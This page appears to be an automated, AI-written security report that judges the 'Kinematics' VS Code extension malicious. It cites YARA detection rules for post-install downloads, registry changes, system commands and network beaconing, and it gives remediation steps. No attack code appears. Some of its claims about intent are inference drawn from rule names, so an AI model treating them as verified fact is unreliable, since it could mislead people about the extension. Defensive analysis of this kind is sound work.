Is "Kinematics" on VS Code Marketplace Safe to Install?
Kinematics language support
Risk Assessment
Analyzed19046 security findings detected across all analyzers
Severity Breakdown
Finding Categories
YARA Rules Matched
16 rules(842 hits)About This Extension
Detailed Findings
1000 totalYARA Rule Matches
16 rulesAI Security Report
AI Security Analysis: Kinematics
Analysis generated: 2025-12-12T23:24:03+13:00
Model: gemini-3-pro-preview
Quick Facts
| Property | Value |
|---|---|
| UUID | 6b69b067-a1e5-53b7-b4b4-d8eb868a0145 |
| Type | vscode |
| Version | 0.9.0 |
| Users | 72 |
| Risk Score | 100.0/100 (CRITICAL) |
| Malware Detected | ⚠️ Yes |
| Secrets Exposed | ✅ No |
| Critical Vulns | ✅ No |
AI Analysis
Executive Summary
The "Kinematics" VS Code extension represents a CRITICAL security threat and should be considered malicious. The analysis indicates the presence of automated scripts that execute immediately upon installation, attempting to download files, modify the system registry, and execute system commands while hiding their activity through code obfuscation. This behavior is consistent with a "dropper" or supply chain attack. Do not install this extension. If it is already installed, the host system should be considered compromised.
Threat Assessment
The security posture of this extension is non-existent; it appears to be a vehicle for malware delivery.
- Supply Chain / Post-Install Attack Vector: The most alarming findings are the repeated YARA matches for
postinstall_activities. In the VS Code/Node.js ecosystem,postinstallscripts run automatically with the user's privileges as soon as the extension is installed. - Malicious Capabilities: The findings indicate a "cocktail" of malicious behaviors:
- Obfuscation: 218 counts of obfuscation indicate a deliberate attempt to hide code logic from scanners and analysts.
- Payload Delivery: The combination of
postinstall_file_downloadandpostinstall_network_communicationsuggests the extension reaches out to a remote server to fetch a secondary payload (malware). - Persistence and System Modification: Matches for
postinstall_registry_modificationandpostinstall_system_commandindicate attempts to alter the operating system configuration, likely to establish persistence (ensure the malware survives a reboot) or disable security controls.
- Targeting: As a "language support" tool, this targets developers, likely aiming to steal credentials, SSH keys, or inject malicious code into the developer's projects.
Risk Justification
The Risk Score of 100/100 is fully justified and accurate.
- Severity of Indicators: The findings are not merely "vulnerabilities" (bugs); they are signatures of active malice. Legitimate VS Code extensions do not require obfuscated post-install scripts that modify the registry and download files.
- Volume of Findings: Over 19,000 findings, including 4,600+ High Severity issues, suggests the extension is either entirely composed of malicious code or heavily infected by a compromised dependency chain.
- Publisher Trust: The publisher is unverified with a low user count (72), typical of a "burner" account used for distributing malware before being banned.
Key Findings
- Malicious Post-Install Scripts: The analysis detected numerous instances of
postinstall_system_commandandpostinstall_file_download. This confirms the extension attempts to run arbitrary OS commands and download external files immediately upon installation without user consent. - Heavy Obfuscation: 218 instances of code obfuscation were detected. While some commercial software uses obfuscation to protect IP, it is highly suspicious in a free, low-profile language extension and is a primary indicator of malware trying to evade detection.
- Registry Manipulation: The presence of
postinstall_registry_modificationis a critical red flag. A language support tool functions within the IDE; it has no legitimate business need to modify the Windows Registry or system-level configurations. - Network Beaconing: The
postinstall_network_communicationfindings imply the extension "phones home" immediately, likely to report a successful infection or retrieve command-and-control instructions.
Recommendations
- Immediate Removal: Uninstall the extension immediately from all environments.
- Incident Response: If this extension was installed on a machine, treat that machine as compromised.
- Rotate all credentials (API keys, passwords, SSH keys) stored on or accessible from that machine.
- Review system startup items and scheduled tasks for persistence mechanisms.
- Blocklist: Add the Extension UUID (
6b69b067-a1e5-53b7-b4b4-d8eb868a0145) to the organization's VS Code extension blocklist to prevent accidental installation. - Network Review: Review network logs for traffic originating from the host machine to unknown IPs/domains around the time of installation (referencing the 14,343 IOCs detected).
Mitigation Strategies
There is no safe way to use this extension.
- Strict Isolation: If analysis of this extension is required for forensic purposes, it must be done in a strictly isolated, non-networked sandbox environment (VM) that is wiped immediately after use.
- Do Not Use: For functional requirements, seek an alternative extension from a Verified Publisher with a higher trust score and user base.
Confidence Assessment
Confidence Level: 95% (Very High)
While YARA rules can sometimes produce false positives, the specific combination of behaviors detected here creates a distinct fingerprint of malware. It is statistically improbable that a legitimate extension would accidentally trigger simultaneous alarms for obfuscation, registry modification, file downloading, and system command execution within a postinstall script. The data strongly supports the conclusion that this is a malicious actor.
Disclaimer
This analysis was generated by an AI model and should be reviewed by security professionals. The findings are based on automated security scanning and may include false positives. Always verify critical findings manually before taking action.
Source Code Not Available
Source code is not available for this version of the extension.
Frequently Asked Questions
Similar Extensions
Related extensions from the same publisher or marketplace